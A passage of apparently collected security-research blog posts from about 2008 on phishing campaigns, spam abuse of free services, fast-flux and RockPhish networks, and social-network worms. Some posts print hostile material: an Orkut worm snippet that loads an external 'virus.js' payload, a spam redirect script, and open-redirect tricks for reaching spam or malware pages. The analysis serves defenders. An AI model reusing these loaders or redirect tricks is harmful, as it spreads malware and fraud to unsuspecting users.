Session=cvv2.gif&password=TESTING&ccnumber=6666666666666666&
month=10&year=10&
cvv=666&__EVENTTARGET=RicaricaCartaPPayPagamentoPPayEdit1%3AbtnContinua&__EVENTARGUMENT=HTTP/1.1 200 OK
Date: Fri, 14 Mar 2008 18:00:39 GMT
Server: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.0-8
X-Powered-By: PHP/5.2.0-8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1

It seems that phishing will remain a part of our daily lives. And what is most alarming is the ease with which someone could change a few lines of the scripts to redirect the user to whatever site that requires authentication and grab very sensitive information which could be use to steal money as well as any other type of information.

So far the Web site hosting the modifications required for the host file and the IP hosting the fake pages are still live and sending data, so you can imagine how much could be gathered in just a few days or even a few hours. The reverse DNS details for the IP appear to be forged. We have contacted the owner of the IP and the bank itself to investigate further and have the fake site shut down as soon as possible.
Visit.geocities.com and geo.yahoo.com were involved, as well, probably for tracking purposes.

Safe banking, folks!

Early this year we observed spammers using Google page ads in HTML-formatted emails to redirect users who click the spammed URL to the spammers’ sites.

http://www.google.com/pagead/iclk?sa=l&ai=MfeNYS
&num=123456&adurl=http://www.spammersite.com

At first we thought Google page ads were being used to conceal the actual URL and subvert traditional anti-spam detection techniques. However, it seems one can change the linked URL to point to any site of your choice–as no validation appears to be done on Google’s end.

One can even point the Google page ad to executable files (malware authors have started doing this), and the link will redirect and download the malware just fine. It’s kind of ironic given than Google is very strict about the kind of file attachments one can upload/download via their Gmail service.

http://www.google.com/pagead/iclk?…adurl=http://download.nai.com/…/win_xdatbeta.exe

The preceding example downloads a McAfee signature file in executable format.

Google must be aware of this redirect abuse, and it’s hard to understand why they don’t prevent these redirects working for known bad file types or for spam and malware sites.

Since yesterday, we have been tracking some heavy spammings of fraudulent emails geared towards Italian citizens. In these emails, the receiver of the email was notified of being the subject of an investigation from a fictitious Italian investigation task force named “CAFF”, which is supposed to be an acronym for “Comando AntiFrode”. In the email, the receiver of the email is urged to check out the list of people under investigation of the CAFF (which again, does not exist - but sounds real enough), conveniently located on an external website. On this website, the user is tricked into clicking a link to view the list of people under investigation. The site then tries to install its malware, in case the user’s security settings are low, without further user intervention. The list, of course, is a lovely piece of malware, that we detect as W32/Caffer@MM.

While the malware in this run does not represent anything particularly new, it is interesting to note the high quality of the localized social engineering attempt: we’re afraid that this “quality content” may have tricked numerous local users into visiting the malicious website then downloading and executing the linked malware. In fact, the language used in this email is carefully chosen, as is the layout of the website, which leads an unsuspecting user to conclude that the webpage is legitimate. Avert Labs is also assisting the Italian authorities in this matter.

In order to be better prepared and educated against this kind of threats, our readers may also want to download the latest issue of our Sage magazine, which got released today and speaks of localized threats. Grab a fresh copy now here!

Logging off now,

Paolo

Today at Avert Labs, we released the third edition of Sage - our security journal. As always, we strive to be a bit different with our content in Sage. A little provocative, new trends, new ideas… And this issue is no different.

In this issue we look at the growing trend of localization in malware and threats. Cybercriminals are increasingly crafting attacks in multiple languages and are exploiting popular local applications to maximize their profits. Cybercrooks have become extremely deft at learning the nuances of the local regions and creating malware specific to each country. They’re not just skilled at computer programming—they’re skilled at psychology and linguistics, too.

We examined global malware trends in this report, titled “One Internet, Many Worlds.” The report is based on data compiled by our international security experts and examines the globalization of threats and the unique threats in different countries and regions. In the report, we detail the following trends and conclusions:

• Sophisticated malware authors have increased country-, language-, company-, and software-specific attacks
• Cyberattackers are increasingly attuned to cultural differences and tailor social engineering attacks accordingly
• Cybercrime rings recruit malware writers in countries with high unemployment and high levels of education such as Russia and China
• Cybercriminals take advantage of countries where law enforcement is lax
• Around the world, malware authors are exploiting the viral nature of Web 2.0 and peer-to-peer networks
• More exploits than ever before are targeted at locally popular software and applications

Download Sage 3

Each year I eagerly await the annual Federal Trade Commission report on Consumer Fraud and Identity Theft Complaint Data. It has been available for the last few days and confirms that after a three year stability period, the situation is moving.

For the first time since 2004, the three complaints indicators are increasing. In 2007, the FTC received over 810,000 Consumer Sentinel complaints when they had never taken over 700,000 in any previous year. As ever, Identity Theft is the main complaint category. It has reached 32%. In 2007, 64% of fraud complaints involved unscrupulous companies initially contacting consumers over the Internet. This percentage has grown year after year. It was 60% in 2006 and 55% in 2005. E-mail contact is the most frequent method.

Consumers reported fraud losses totaling more than $1.2 billion; the median monetary loss per person was $349, the report states.

With this report, FTC released its top 20 complaint list is follow :

McAfee Avert Labs has received reports of a new phishing attack that purports to be from the U.S. Internal Revenue Service (IRS). This email attack is similar to IRS phish campaigns seen before and offers victims a $375.20 refund directly to their credit card for filling in an online form. A copy the spammed email is shown below:

IRS phishing scams faithfully appear every year during the US tax season. There have been several campaigns in the past and this one was first observed on Jan 28th in our spam traps.

The phish is hosted on a legitimate website based in the United States that deals with special effects for Halloween and movie props. The phish page is a rip-off of the original IRS website and the online form asks for the victim’s name, social security number and credit card details. In addition to these CVC/CVV2 and ATM pin number details are required. Makes you wonder how many people would still give such information in their eagerness to get a refund given it is the middle of the tax season.

Of late we are seeing the numbers of legitimate web sites compromised by attackers surpassing those purposefully hosted by an attacker. By abusing compromised legitimate web sites to host malicious code, a spammer can subvert real-time blacklists that are used to traditionally check for the validity of links advertised in emails.

When the website owner was informed of this compromise, his reply was “I’m not a techie, but I have to run this site and don’t know how to fix this problem. Any help would be wonderful.” This brutally honest reply left me speechless!

Ps: I’ve ensured a McAfee Avert Labs field service engineer would be getting in touch with him shortly as well as making sure the IRS has the spamming information.

When a registrar registers a domain name, there is a five-day Add Grace Period (AGP) where he may cancel his request and receive a full credit for the registration fee from the registry. This trend has been gaining popularity since mid 2005, and although it was originally set up for avoiding mistakes, the practice now is frequently abused.

Beside the fact that some domainers use it to track names with a high potential to generate traffic and thus pay-per-click revenues, people who use the fast-flux and rockphish techniques, which we have already discussed here in detail, now use it in proportions that would be interesting to measure. Domain Tasting involves registering names only to release them very quickly and without paying for them. This practice exploded in 2007, and an incredible number of temporary domain names, having definitely been used to carry out malicious activities, were deleted at the end of this add-grace period.

A quick analysis of the activity of registrars that are accredited by the ICANN (Internet Corporation for Assigned Names and Numbers) helps to measure the phenomenon. Already in 2006, during an organizational meeting, a workshop called domain name marketplace looked at figures from Verisign, the register for .COM and the one for .NET. Between May 1 and 31, 2006, they listed 616 registrars that had registered at least one name. Only 18 of them were responsible for 98.1% of this type of activity.

The following graph from Nick Ashton-Hart (Director for At-Large at ICANN) makes this clear:

It shows that the phenomenon is continuing to grow and that it involves more than just a few companies speculating on highly attractive domain names.

This month, McAfee Avert Labs will release our third issue of our security journal “Sage,” which in this edition examines regional issues in security and malware in different parts of the globe. Here at Avert Labs we’re reacting to these trends by reorganizing to more effectively deal with those local and regional challenges. In that vein, I’m proud to announce that Guy Roberts has been named as Avert Director of Operations for EMEA (Europe, Middle-East, and Africa). Normally we talk only about security threats and trends on the Avert Labs blog, but this is a special occasion.

Guy will be responsible for all anti-virus and anti-spam operations for all of EMEA. Guy has been working in the AV industry for more than 10 years on products for desktop, gateway, and management and has a broad understanding of customer’s needs. He has also been responsible for turning the McAfee anti-spam technology into an industry-leading messaging solution.

Guy will bring a strong customer focus into the region for Avert Labs as well as continue to help advance our detection and coverage across all technologies!

The recent wave of Google “I’m Feeling Lucky” search-spam that Chris Barton blogged about a while ago has added a new flavor to the never ending recipe book of spam.

Typosquatting is the practice of buying up domains that rely on users misspelling well known websites. Large organizations (like Google) will often register these domains to protect their users from accidentally going to possibly undesirable sites. One such domain is gooogle.com (3 o’s).

Yesterday I saw a high volume spam run that used this domain along with the “I’m Feeling Lucky” option that brings you to the first search result.

Interestingly some quick thinking anti-spam people have thwarted the spammers and now the search result redirects to an anti-spam website rather than the pill-pushing website you were supposed to see.

Google has many domains that spammers continue to try to abuse, but our detection methods don’t rely on the domain name… so back to the drawing board for the spammers!!

It’s not a secret anymore; criminal organizations behind a large part of Internet-related frauds are huge and well organized. In the last quarter of 2007, two studies about RBN (Russian Business Network), one of the most well known criminal organizations so far, were published. Last year, I looked at them with great interest. The first is named Uncovering Online Fraud Rings: The Russian Business Network and is available as a webcast recording on the Verisign web site. The second was written by David Bizeul and is named Russian Business Network study.

These papers demonstrate and illustrate that RBN is an empire. It directly or indirectly manages potentially a million sites. Thanks to elaborate intrusive advertising techniques, millions of Internet users visit its fake retail sites every month. Hackers and other cybercriminals also have their stores and outlets there: malware sales, service offers and booby-trapped sites. Pornography and pedophilia always make money there.

In addition to these documents, some particularly thorough stories have been circulating on the Net (papers from Brian Krebs, Washington post and posts on the RBNexploit and Dancho Danchev blogs).

Mailing addresses, name and photos of suspects, detailed lists of machines and autonomous systems as well as many other details were revealed. Because of this, the group has deemed it best to partially disappear. On November 6th, 2007, many network nodes stopped responding. It was not the end of them though; the business has been carefully planned: high-activity sites – those leading the attacks at the time – were not disturbed. Gradually, the affected sites began to re-appear in Russia as well as all over the world. Today, many countries in Southeast Asia are mentioned, but they are not alone. The reorganization is on the move: new retail payment systems for fake products (mainly fake security products and fake video codecs), new legitimate sites hosting tricky banner ads redirecting computers to these fake retail web sites, new Storm (aka Nuwar) worm campaigns achieved by new C&C botnet implementations, new web sites hosting malicious software (like MPack or WebAttacker) and secretly reached after the victims encounter a hidden iFrame during Internet surfing.

People tracking down RBN regularly watch its Autonomous Systems (AS). These are collections of connected IP networks controlled by a single entity and defined by an AS number. The RBNexploit blog and the David Bizeul document are very comprehensive on this subject and various network maps or tables help the reader to understand the complexity of such an organization.

One puzzle piece is known as AS40989. Despite the fact it was not the core center of the RBN activity it is well-known because it seems to be the official name of the group. It is the subject of a new write-up available at the Shadowserver Foundation web site.

This document analyzes the malicious binary activity directed to and commanded by AS40989. From March to November 2007 the researchers collected 2859 pieces of malware which initiated HTTP connections to it. They found an impressive collection of malware: “Gozi, Goldun, Hupigon, Nurech, Nuklus, Pinch, Sinowal, Tibs, Xorpix, various dialers, downloaders, worms, adware, page hijackers, and proxies”. Once again, it demonstrates the professionalism and the size of the group.

Reading material on RBN is abundant. With this post, I only wish to draw your attention to this existing material. It demonstrates the vitality of the new criminal organizations, it also demonstrate that many people, at McAfee and elsewhere, stay tuned into the dark side of the Internet to understand how the situation is constantly changing and to fight against this threat at a worldwide level.

“If its free and worth abusing, discovery time is the variable these days.”
(Or rather… spammers are the bane of free services…)

Our labs trapped many thousands of spam overnight that are abusing the Windows Live SkyDrive Beta service launched in August last year (or rather it’s the new name for Windows Live Folders…). The service allows you to upload up to 1Gb of files and share them with anyone via weblinks. The trapped pill spam promises the usual assurances:

We sell only fda prescription medicine through our fully licensed
pharmacy. orders are overseen by licensed accredited physicians.

http://hostname.bay.livefilestore.com/..Long-url…/adv-filename.html

{english textual bayes poison}

The payload is an html file with just one line of HTML at the moment, that redirects your browser to the current incarnation of spammers pill-serv:

<html><body><script language=JavaScript>window.location.replace(
"http://top10epharms.com“)</script></body></html>

We’d expect this to change to obscured script or meta redirection in the not to distant future.

It’s not just spam either, the technique has also been spotted in the labs on blogspot splogs too.

So what makes services like these worth abusing and attractive to spammers?

• Unique urls
• Domains relatively safe from blacklisting
• Link longevity
• abuse handling issues
• Features - host *almost anything*
• Great Price
• Someone else pays the hosting costs

It’s a great value proposition for abuse isn’t it? Well not really, it the same proposition as just about ever other file sharing service out there, this one just got hit, big, suddenly. Another interesting point is the number of times we trapped each url was interestingly low for such a big campaign, I’d therefore estimate they had tens of thousands of files uploaded. We’ve seen a few small scale spam using SkyDrive service dating back to November last year but were on an much smaller scale to last nights campaign. I’m sure it won’t be too long before it’s used to host other unwelcome content types I’d like to see more of these online file storage offerings malware scanning downloads too.

They have a pretty good terms of service document that this spammer is clearly in breach of. I will be honest and say that I am not going to fill out an online abuse form for every individual url though! SkyDrive folks - feel free to get in touch if you’ve not had enough reports

If you try SkyDrive be sure to leave feedback and suggestions here and here, it looks very neat so far.

With Christmas upon us, the bad guys behind Nuwar (a.k.a. Storm Worm) couldn’t miss the opportunity. Here is an example of an e-mail you may receive:

If you follow the link (please, don’t!), you’ll be greeted like this:

By this time, of course, a not adequately protected computer would already be infected by Nuwar through a mixture of exploits. And if that doesn’t work, Nuwar authors always leave a chance for a gullible user to click on the image and get infected by the downloaded executable.

I analyzed some suspicious scrap “2008 vem ai… que ele comece mto bem para vc” from a bunch of friends on Orkut. For a while it was all over Orkut!! Translated to English, it reads “2008 is coming…I wish that it begins quite well for you”.

The HTML source of the scrapbook gives:

script type=”text/javascript” var flashWriter = new _SWFObject(’http://www.orkut.com/LoL.aspx’, ‘408030725′, ‘1′, ‘1′, ‘9′, ‘#FFFFFF’,
‘autohigh’, ”, ”, ‘408030725′);
flashWriter._addParam(’wmode’, ‘transparent’);
script=document.createElement(’script’);
script.src=’http://files.[REMOVED].com/virusdoorkut/files/virus.js’;
document.getElementsByTagName(’head’)[0].appendChild(script);
escape(”); flashWriter._addParam(’allowNetworking’, ‘internal’);
flashWriter._addParam(’allowScriptAccess’, ‘never’);
flashWriter._setAttribute(’style’, ”);
flashWriter._write(’flashDiv408030725′);
/script

When an Orkut user receives this malicious scrap, the browser downloads and executes the embedded virus.js script. It seems to do at least 2 things (it’s obfuscated and compacted, and I am writing this without any detailed analysis of the script so far) - scrap your friends with the same virulent message, and add your account to an Orkut community “Infectados pelo Vírus do Orkut” (”Infected by Orkut Virus” in English) created by the script author:

http://www.orkut.com/Community.aspx?cmm=44001818

A more detailed review of W32/KutWormer can be found in the Avert Labs Threat Library here.

As of the time of this writing, it had about 400,000 members (victims of this spam-worm). Apart from this, the worm doesn’t seem to affect your machine in any way. As I am writing this blog, I have seen the scraps disappearing so it looks like Orkut/Google are fighting back.

This clearly illustrates the issue with allowing rich-content on social/professional networking sites, and not sanitizing it enough. The ability to add Flash/Javascript content to Orkut scraps was only recently introduced.

We often talk about the trade-offs between security and convenience, especially as it pertains to Web 2.0.  Much of the technologies utilized by Web 2.0 sites were built for collaboration and a rich user experience, which has really fueled the explosion of social networking sites like MySpace, Facebook, and others.  Today I bit the bullet and created a Facebook account, only to observe a prime example of security taking a backseat to convenience.  Here I’m not criticizing the security of Facebook’s servers or applications so much as the expectation the site is establishing with its user base.  The pages in the screenshots below are served over a secure HTTPS connection, but the information Facebook is asking for is what you’d expect to find in a typical phishing attack.

The page in question is https://register.facebook.com/findfriends.php.  When navigating to this page without logging in, it appears as follows:

This page is tame compared with the version you get once you’ve logged in:

To recap, for your convenience, Facebook is allowing you to enter in the following information:

• Email username and password
• AOL Instant Messenger username and password

The site also asks you to click “Yes” when prompted to display “nonsecure items” so that you can the download and execute an application named “facebook.exe” (from an insecure site), so that the program can then harvest your Outlook contacts and upload them to their server.

I’m not suggesting that Facebook has anything other than good intentions here, but training users to handover confidential information for a little convenience is not a good thing.

P.S.  The CAPTCHA is real.

Spammers have been abusing free hosting for a long time. Yahoos’ Geocities was pretty heavily targeted in its day and more recently Googles’ Googlepages and blogspot are the abused services of choice. The general idea being spammers can get 1-20+ thousand accounts a day with unique urls and point them at a handful of spammed domains that they had to pay for.^[1] It’s improbable that any external party can compile a complete list of the abused accounts, report them to the host and the host engage somebody cluefull 24/7 to take-down the sites in any reasonable time period to make the spammers campaign ineffective.^[2]

I know, I’ve tried!

Those of you that read this blog a year and a quarter ago will remember that the metric truckload of accounts are often provided as a paid service to spammers if they are not able to perform the required tasks in house.

- Spammers have also been abusing the free blog services for a long time. (and setting up their own fakes)

- Spammers have also been abusing the free tiny url services for a long time. (and setting up their own fakes)

There is a common theme here! Free services that allow or facilitate blind redirection. It’s all about getting emails through and links in front of victims and as a rule of thumb, the more popular the service you abuse the less likely it is to blocked by the blacklists. Surbl have an open letter to redirection services, if you want some more education on the subject from the blacklist prospective. ^[3]

It’s no surprise that the next popular service to be abused is the search engines. To be clear, I’m not talking about Spamdexing (manipulating text for high search index rankings) or SEO dirty tricks, but (ab)using a search provider as a redirector by using the more advanced search options combined with “Feeling lucky” features that take you to the top search result.

I’ll dissect this mornings sample for you noting one additional point:
- Spammers have also been abusing the free webmail services for a long time.

A quantity of Yahoo webmail spam kindly deposited its self in one of our many millions of spamtraps, DKIM signed, SPF passed Etc, Etc. Inside it was a link to a “feeling lucky” link c/o rival search giant Google.

Abused Search Host: http://www.google.com/
Search Function: search?q=
Search Feature Text in the URL: inurl:games-pro
Search Feature Text int he page: intext: won1 million megabet from casino online ^[4]
Search Invisible Redirect Feature: btnI=Lucky

If you put this lot back together you’ll get an invisible redirect (302) to casino-games-pro that’ll try and auto-install the CasOnline PUP. Charming.
I’d like to point out here that if you try to send a spammy link out via yahoo webmail they captcha test the sender. (but they also did that when the accounts were setup, right?) The trick here is the fact that there is nothing spammy about a search link. I have no doubt that /btnl=Lucky/ will be hitting the filters at Yahoos webmail HQ very shortly if it hasn’t already.

The “Feeling Lucky” spam technique is not particularly new, but this webmail twist does show the relentless diversity of spammers abuse of free services provided by the big players alongside their abuse of the smaller fish that Kevin blogged about the other day. As he pointed out, the spammers are using the phishers techniques, how long before we see “btnI=Lucky” in phish.

All of these methods are popular because it’s not really possible for RBLs’ or URIBLs’ to block them without collateral damage to innocent sites making it more likely that spammers links will get through to the inbox. Though when the abuse is more than background noise things do happen.^[5]

^{[1] Lets assume for ease they actually do pay, in reality it’s stolen card & credentials sample from some carder IRC channel.
[2] Testing a random Googlepages link spam from last month shows that everything is still working.
[3]For the record many shorter-link services took notice rapidly!
[4] Yes I linked ” won1 million megabet from casino online “ - so what? I really do hope this blog helps.
[5] Tale a look at SBL60999.}

A few weeks ago, while catching up on Internet pop culture videos, I stumbled upon a few 2girls1cup-reaction videos on Ebaumsworld. Having watched the reaction videos, I was naturally curious what the actual 2girls1cup video was about. A quick Google search revealed 740,000 results for “2girls1cup”–seems everyone’s already watched it except for me.

I quickly found the video and like everyone else in the reaction videos, my eyes were glued to the screen. After watching some more reaction videos, I came across a blog comment that promises 2girls1finger is even better–and it links us to the site (http://us-private-[BLOCKED].blogspot.com). Awesome! Let’s check it out…

Here’s a screenshot of the linked site:

The site wants me to download this “codec”:

Looking at the download dialog, the .exe seems to be from http://powerm[BLOCKED].com. (Sounds legit, I guess.) I went ahead and downloaded the codec. (Note: Don’t try this at home, folks; I’m a professional. You should never download content from untrusted sources.)

After downloading the “codec,” I clicked the Continue button on the video screen. This action just popped up the download tab again. I don’t understand why–I had already downloaded it. Next, I clicked the Cancel button; that action threw me into a loop between the following two pop-ups (how’s that for annoying?):

It turns out this codec wasn’t so much a codec as a Trojan. Here’s a write-up from McAfee.

Don’t forget that downloading content from untrusted sources often means downloading malware. Keep this in mind while searching for the next bizarre fetish clip or its reaction videos. Here’s a similar blog entry posted last year. Same attack vector, just a different video.

I’m currently monitoring a high volume pharmacy spam campaign where the spammers have dropped a file onto many small legitimate country TLD websites. So far I’ve seen 150+ domains from all over the world being abused.

http://[legitimate domain].co.il/redir.html
http://[legitimate domain].de/redir.html
http://[legitimate domain].si/redir.html
http://[legitimate domain].es/redir.html
http://[legitimate domain].com.tw/redir.html

The file is called redir.html and simply redirects your browser to the spammers website.

Clicking on the link brings you to a Canadian Pharmacy website:

The majority are small business websites, personal websites and blogs. These are probably the least secure making it easier for the spammer to get the redirect file onto the site. Country tld domains are more likely to have a higher percentage of smaller local websites making it easier for the spammer to find ones that are not properly secured.

This is by no means a new technique but something I’d associate more with phishing. As a colleague just said, “the spammers are following the phishers for a change”. It highlights the need for properly secured websites no matter how big or small.

Last Friday, I started some analysis on fast-flux techniques. I stopped my discussion with single-flux so today I will improve on the camouflage!! To do this, the fake site’s IP addresses are varying as well as the IP addresses of the name servers that define them in the DNS architecture. This is double-flux.

Here, the criminal has a genuine control and monitoring workstation. These machines are no longer just for relaying http traffic; they simulate the domain name servers and resend the various IP addresses for the connection which - as before - are valid only for a moment.

When the victim tries to reach the site he would like to visit, a request is sent to the name server with authority over the zone. Just like with single-flux, the short lifespan of the address leads the name server request to the criminal network. First used at this level, the fast-flux technique causes the request to be redirected to a first zombie machine inside the botnet (fast-flux on name servers - IP_A to IP_E). This machine requests the response from the C&C workstation and forwards it to the requestor by using the same method a second time (fast_flux on web site - IP_1 to IP_9).

In return, the IP address of another zombie machine is sent to the victim. This second bot relays the traffic, preserving the criminal’s anonymity.

As the hereafter blurred image suggests, this third example deals with an adult site that tries to remain discreet about its origins. Two dig commands launched a few minutes apart show us the result.

On the web site side, the expiration dates are reduced to 10 minutes (600 seconds), and the site’s IP addresses are very varied (fast-flux on web site). It’s the same for the domain name servers, which changed within a short period of time (fast-flux on name servers).

Combining the three previous methods gives a major headache :-). But as result, we obtain the scheme used in the mysterious RockPhish structures. The ingredients are:

• lots of domain names,
• a fast-flux botnet network in double-flux mode,
• specialized software that is responsible for sending out phishing e-mails, where each recipient is assigned an index. This is used as a parameter in the URL, and again within the mirror site as long as the victim gets connected.

I won’t bore you with the final synoptic for the network traffic. Simply seeing the next URLs collected in the phishing e-mails collection gives you an idea of the complexity of the attack.

The host domain name varies, as do the domain name servers. The control and monitoring workstation manages the structure of the network in real time. Let’s not forget that this is primarily a network of compromised machines (a botnet). The index is there to ensure proper redirection according to victims, banks, machines to be activated, and the group of fraudsters profiting from the attack.

I hope this dissection interested you. It demonstrates that attacks are more and more sophisticated. To be sure, groups like the ones using RockPhish with so much energy to improve their network resilience and stealth are doing so because it is very profitable for them.

For several years, we have been talking about the sophistication of attacks. The main goals are discretion, camouflage and profitability. Some of the common techniques and tools are named Fast-Flux, RockPhish or MPack. As I recently worked on some spam campaigns and dubious websites, I will use them as examples and explain some of these new cybercriminal methods in a set of two blog contributions.

Before complicating the scheme, let me start with a very simple example:

Here, a spammer owns a lot of domain names. He constantly buys new ones using stolen credit card numbers and uses them accordingly with the service interruptions that can occur very quickly or slowly, depending upon the vigilance and honesty of the access providers.

One machine contains his site. It may be dedicated to selling medicine or counterfeit luxury products. In order to trick anti-spam software, e-mails are personalized with background noise and random text. For more diversification, and due to the many domain names he has, his software changes the URL of his site for the various messages it sends.

When a victim tries to follow the link provided for them, a process makes a request to the local name server for the IP address of the machine corresponding to the URL they were sent:

If the information exists at this level (a cache mechanism), it is forwarded directly to the requester. Otherwise, and if the link is still valid, the desired IP address is returned only after checking root and/or primary servers. Dozens of different domain names could point to a single machine.

Here is an example of a result that could be obtained using this method:

With phishing, the methods are becoming more complex. This curve issued from APGW statistics does not highlight the number of victims, which has increased a lot this year.

It shows that, since mid-2006, the total number of incidents (with and without a victim) has remained stable. What’s interesting are the peaks in November 2006 and particularly in April 2007. The question is: how can we have three times more phishing sites than identified attacks? The answer is called RockPhish.

To understand it better, we will expand upon the previous example and look at the intermediate single-flux and double-flux methods.

In single-flux, the criminal has just one domain. Thanks to an unscrupulous access provider, he manages his own domain name server. The criminal also has a network of compromised machines available to him, which he uses as a platform to relay between the victims and his site. The use of very short DNS expiry dates linked to a round-robin technique involving many zombie machine IP addresses allows it to continually change a fictitious physical address used to reach the mirror site.

The latter is therefore even better protected.

When the victim tries to reach the mirror site, a request is sent to the name server with authority over the zone.

The lifespan of the address being no more than a few minutes, there is generally no cached solution. The criminal’s name server is therefore checked. The IP address of one of the bots is sent back to the victim. During the several minutes of the transaction, it will relay the traffic and then disappear, making it more difficult to locate and therefore neutralize key sites.

Here is an example of an online casino site using single-flux technique:

My Windows dig (Domain Information Groper) version shows some distinctive network features: the expiration dates here are very short, and the IP addresses are very varied. This is the mark of a camouflage using the single-flux technique.

Next post will allow us to see how work a double-flux and, after that a RockPhish network.

Many websites utilize a challenge-response mechanism know as CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) to protect against automating the creation of user accounts, content, or otherwise abusing services they provide.

Most common CAPTCHA systems work by generating distorted characters, text, or pictures that can be easily recognized by the human brain but present significant difficulty for computer OCR (optical character recognition) or other image recognition systems.

Enter Social Engineering. Although CAPTCHA may be fairly effective at verifying a reply is from a human and not a computer they do not guarantee that it is from the human for which the challenge is intended.

Example…

1. Website A hosts a service protected by CAPTCHA verification.
2. Website B is set up by a party desiring to automate usage of the services of Website A.
3. Website B offers users free access to content, but requires they defeat a CAPTCHA challenge.
4. Website B copies a CAPTCHA image from Website A that it needs defeated and presents it to a user visiting Website B.
5. The user provides the CAPTCHA response.
6. Website B provides the offered content to the user, and then uses their response to defeat the CAPTCHA test on Website A.

In this way automation residing on Website B can distribute the work of defeating CAPTCHA challenges to many people that are unknowingly providing responses to challenges from Website A. In some ways it is similar to a distributed computing model. Instead of distributing tasks out to computers however, the idea here is to distribute the CAPTCHA tasks out to humans.

This method was used by spammers 1994 to defeat a turing text-based spam protection mechanism in Microsoft’s Hotmail service. The spammers promoted a Web site containing pornography and required visitors to enter a CAPTCHA before they are were granted access. The CAPTCHA that were used to access the porn site were originally generated by the Hotmail service. The CAPTCHA solutions entered by the visitors to the porn site were then used by the spammers to solve the CAPTCHA challenges in Hotmail, allowing them to automate the creation of new accounts for sending spam.

More recently, trojans such as Captchar have been utilizing this method as well.

Although it is possible to identify the difference between a computer and a human there may yet be a challenge in verifying that a given human response is from the intended human.

I came across an interesting website today while doing some analysis on Generic VB.b!e3cf12. In summary, it tried to redirect users trying to visit escrow.com to another spoofed website that is being hosted on the Verio network. To have a full picture of what it does, please review the Virus Information Library page of that trojan.

What I found striking is the fact that the fake and the authentic websites looked almost similar and were hard to distinguish without paying attention to the fine details. Of course, having the same address on the address bar is the main point of deception, but the effort that was put into editing the contents wasn’t negligible either.

A screenshot of the fake website’s main page

The fraudsters behind the fake website made the effort to educate users on “How to Spot a Fraud Site”. Well, not really. They just edited the original page and posted less information If we do a quick comparison between the two versions, we find the important pieces which they’ve omitted:

• Determining the date that a domain name was registered can often give clues that a site is fraudulent. Many fraudulent sites claim that they have been in operation for several years, but their domain names have only been registered for a few days or weeks. To determine the date a domain name was registered, you can use the “whois” tool found at most domain name registrars.
• If a site uses person-to-person money transfers such as Western Union, it is probably fraudulent. See what Western Union says about fraudulent escrow services by clicking here.
• If the escrow site requests payment to an individual (or “agent”) instead of a corporate entity, it is probably fraudulent.
• If the site does not use SSL to protect user sign-in information, it is not a secure site and is most likely fraudulent. Most browsers display a padlock or similar symbol in their status bar to show you when your information is being protected by SSL. However, having a SSL certificate is no evidence that a site is legitimate.
• www.escrow-fraud.com keeps an updated list of the escrow scam sites and legitimate sites. Visiting this site will help you better protect yourself when transacting on the Internet.

A funny comment they forgot to remove (or maybe not!)

• You should call the customer support number (if any) on the site. If there is no phone number on the site, or if you can’t reach the company, it could indicate the site is fraudulent. Consider whether you want to entrust your transaction to a company you can’t reach on the phone.

It’s funny because they removed their non-existing support phone numbers from their website A couple of more things I have spotted while reviewing the fake website is that they did not have any “forgot your password?” feature. The reason is quite understandable. Also, they only accepted credit card payments. No PayPal?!

That one is strange; especially if we knew that the fake website was just a mere interface with no backend and whatever credentials you have supplied, you’ll always end up with an “Invalid Password or Email address!” message.

The worst thing about that service is that their customer support seemed always off duty!

As a brit I’ve always predicted that with the upcoming US elections the online battle will be the most interesting part for me (aside from the comedy of course). So imagine my surprise when I’m greeted by this lot over the weekend:

Subject: Ron Paul Eliminates The IRS!

Subject: Iraq Scam Exposed, Ron Paul

Subject: IRS Fears Ron Paul?

Subject: Ron Paul Wins GOP Debate!

Subject: Ron Paul Exposes Federal Reserve

Etc.

They all linked YouTube searches for “ron paul” which results in the usual electoral propaganda you’d expect 372 days before an election.

Later in the day it changed however. With the usual addition of bayes poison, randomness in the subject lines and a tinyurl and no doubt some additional sending resources since they just burned a load, this campaign moved up a gear.

Subject: Ron Paul Wins GOP Debate! ydB

Subject: Ron Paul Wins GOP Debate! XZHMuk

Subject: Iraq Scam Exposed, Ron Paul qCnUa

Subject: IRS Fears Ron Paul? edukDy

Subject: Who Is Ron Paul? lyI

Subject: Ron Paul Stops Iraq War! nALGU

This is trivial stuff as I’m sure you can appreciate, but that tinyurl did catch my attention:

tinyurl 345s6g -redirects-> 301 Moved Permanently -to-> http://www.youtube.com/watch?v=AeHWW5gbc0w

“This video has been removed due to terms of use violation.”
Now I have no idea what that video was (and frankly dear, I don’t give a damn!) but what struck me is that this would be a really efficient way to remove your competitions videos from youtube. I’m not picking on YouTube here, I believe almost any social site would do the same.

There are 2 people I feel for in this messy situation: postmaster@*.gov and abuse@youtube.com
You’ll be seeing lots of this stuff in the coming months, the most worrying of which will be the false donation solicitations and finishing with incorrect dates for actual polling day!

I wonder how many candidates have EV certs? or “security logos” on their donation sites.

Most of the virus researchers in Avert spend their days analyzing samples coming in from customers. With a good percentage of the samples coming in every day being unknown, there’s plenty to keep us busy, 24/7/365. But what is it like, sorting through an unending stream of samples every day? What does that entail?

It’s a bit like trying to identify a life-form from a disconnected body part. Sometimes the body part is actually the whole animal, but it’s often just a toenail or a feather. There are times where we don’t even get a body part, but a footprint or a piece of the animal’s droppings.

Sometimes we’ll get lucky and it’s an animal whose footprint we know really well, or which has very distinctive feathers. Then we can say “there’s a good chance what you have is a peacock”, based on just that feather. But more often than not, people are dealing with something entirely new or rare. Perhaps this critter only displays its distinctive traits in very specific circumstances.

Of course, our favorite sort of sample is one which is a complete body with a good explanation of where and how the animal was found. Whereas a foot accompanied by no information may get an answer of “This is an amphibian”, more of the animal or more context can increase the odds of us being able to say something more specific: “This is Litoria caerulea - aka the Dumpy Tree Frog. It lives in Australia and it is often found hiding in downspouts.”

So how does someone wishing to submit something for analysis go about doing it?

For starters, include as much info as you can: What version of security product are you using? In the case of our products, what version of the product, what engine and DAT files are you using? Are you seeing detection with some AV product? What filename and virus name was given? Are you seeing strange behavior that you associate with the file?

Getting the whole beast can be a bit more tricky. There’s sort of a continuum of sneakiness, from very spammy looking emails with attachments, to bots which get in through software vulnerabilities and then drop rootkits. If you’re the “lucky” recipient of the easy variety, ZIP up that email and send it to us.)

